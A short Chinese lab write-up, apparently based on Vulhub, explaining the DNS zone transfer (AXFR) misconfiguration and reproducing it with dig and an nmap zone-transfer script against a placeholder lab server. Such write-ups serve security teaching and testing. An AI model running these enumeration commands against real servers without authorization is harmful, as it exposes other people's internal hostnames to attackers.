DNS域傳送漏洞
漏洞原理:
DNS協議支持使用axfr類型的記錄進行區域傳送,用來解決主從同步的問題。若是管理員在配置DNS服務器的時候沒有限制容許獲取記錄的來源,將會致使DNS域傳送漏洞。服務器
漏洞復現:
1.在Linux下,咱們可使用dig命令來發送dns請求。咱們能夠用dig @your-ip www.vulhub.org獲取域名www.vulhub.org 來獲取目標dns服務器上的A記錄。
2.發送axfr類型的dns請求:dig @your-ip -t axfr vulhub.org
可見,我獲取到了vulhub.org的全部子域名記錄,這裏存在DNS域傳送漏洞。
3.咱們也能夠用nmap script來掃描該漏洞:nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 your-ipdom
相關文章
- 1. DNS域傳送漏洞
- 2. DNS區域傳送漏洞
- 3. 淺談「DNS域傳送漏洞」
- 4. [CVE-2015-5254] - DNS域傳送漏洞
- 5. 【漏洞復現】---- DNS域傳送
- 6. DNS區域傳送漏洞復現
- 7. DNS區域傳送漏洞實驗
- 8. DNS區域傳送漏洞實驗和二級域名爆破
- 9. 那些年沒追過的DNS域傳送漏洞
- 10. DNS域傳送漏洞的收集、檢測與利用
- 更多相關文章...
- • 網站 域名 - 網站主機教程
- • XSL-FO 區域 - XSL-FO 教程
- • Flink 數據傳輸及反壓詳解
- • PHP Ajax 跨域問題最佳解決方案
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. DNS域傳送漏洞
- 2. DNS區域傳送漏洞
- 3. 淺談「DNS域傳送漏洞」
- 4. [CVE-2015-5254] - DNS域傳送漏洞
- 5. 【漏洞復現】---- DNS域傳送
- 6. DNS區域傳送漏洞復現
- 7. DNS區域傳送漏洞實驗
- 8. DNS區域傳送漏洞實驗和二級域名爆破
- 9. 那些年沒追過的DNS域傳送漏洞
- 10. DNS域傳送漏洞的收集、檢測與利用